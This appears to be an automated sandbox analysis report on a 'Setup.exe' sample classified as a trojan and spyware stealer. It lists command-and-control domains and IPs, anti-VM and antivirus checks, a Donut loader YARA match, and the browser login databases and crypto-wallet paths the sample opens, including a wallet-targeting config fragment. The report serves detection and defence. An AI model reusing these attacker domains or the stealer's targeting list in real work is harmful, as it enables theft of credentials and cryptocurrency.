Source: Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locketsashayz.click/api9H
Source: Setup.exe, 00000000.00000003.1968199543.00000000014E8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locketsashayz.click/apiR
Source: Setup.exe, 00000000.00000003.2605320460.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139721982.0000000001470000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locketsashayz.click/apiU
Source: Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locketsashayz.click/apiV
Source: Setup.exe, 00000000.00000003.1923253582.00000000014E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locketsashayz.click/apil
Source: Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locketsashayz.click/bu
Source: Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locketsashayz.click/bu9
Source: Setup.exe, 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locketsashayz.click/lao
Source: Setup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959070741.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944632767.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locketsashayz.click/op
              Source: Setup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959070741.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944632767.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/pi
              Source: Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/pijH
              Source: Setup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959070741.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944632767.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/s
              Source: Setup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click:443/api
              Source: Setup.exe, 00000000.00000003.1844311579.00000000041C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Setup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Setup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Setup.exe, 00000000.00000003.1844311579.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1844628829.0000000004176000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855827398.0000000004176000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855995799.0000000004176000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Setup.exe, 00000000.00000003.1844628829.0000000004151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Setup.exe, 00000000.00000003.1844311579.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1844628829.0000000004176000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855827398.0000000004176000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855995799.0000000004176000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Setup.exe, 00000000.00000003.1844628829.0000000004151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Setup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Setup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Setup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Setup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Setup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2

              System Summary

              Source: 00000000.00000002.4139966079.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\Setup.exe | Process Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_014AC7F8
              Source: Setup.exe | Static PE information: invalid certificate
              Source: Setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000000.00000002.4139966079.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/2
              Source: Setup.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Setup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: Setup.exe, 00000000.00000003.1855888119.0000000004137000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1843325900.0000000004155000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Setup.exe | Virustotal: Detection: 8%
              Source: C:\Users\user\Desktop\Setup.exe | File read: C:\Users\user\Desktop\Setup.exe
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: acgenral.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: samcli.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: msacm32.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: dwmapi.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: mpr.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: winmmbase.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: msvcp140.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: vcruntime140.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: mscoree.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: webio.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\Setup.exe | Section loaded: profapi.dll
              Source: Setup.exe | Static file information: File size 74880677 > 1048576
              Source: Setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: Setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: Setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: Setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: Setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: Setup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: E:\AWork\_drw_main\DRWIntelligentScan\bin\Release\Win32\EUImgRepair.pdb source: Setup.exe
              Source: Binary string: E:\AWork\_drw_main\DRWIntelligentScan\bin\Release\Win32\EUImgRepair.pdbOO+GCTL source: Setup.exe
              Source: Setup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: Setup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: Setup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: Setup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: Setup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_014A682C push esi; retf 0_3_014A682F
              Source: C:\Users\user\Desktop\Setup.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\Setup.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\Setup.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\Setup.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\Setup.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\Setup.exe TID: 6064 | Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\Setup.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Setup.exe, 00000000.00000003.2605320460.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139549503.0000000001438000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139721982.0000000001470000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: Setup.exe, 00000000.00000002.4139721982.000000000145F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605856842.000000000145E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1841101694.0000000001462000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWC
              Source: C:\Users\user\Desktop\Setup.exe | Process information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: cloudewahsj.shop
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: rabidcowse.shop
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: noisycuttej.shop
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: tirepublicerj.shop
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: framekgirus.shop
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: wholersorie.shop
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: abruptyopsn.shop
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: nearycrepso.shop
              Source: Setup.exe, 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: locketsashayz.click
              Source: C:\Users\user\Desktop\Setup.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\Setup.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959106248.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959123511.0000000004128000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968429859.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968454080.0000000004128000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Setup.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: Setup.exe PID: 6984, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Source: Setup.exe | String found in binary or memory: *electrum*
              Source: Setup.exe | String found in binary or memory: llets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":["*.dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Wa
              Source: Setup.exe | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: Setup.exe, 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: inance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets
              Source: Setup.exe | String found in binary or memory: *exodus*
              Source: Setup.exe | String found in binary or memory: *ethereum*
              Source: Setup.exe | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Setup.exe | String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
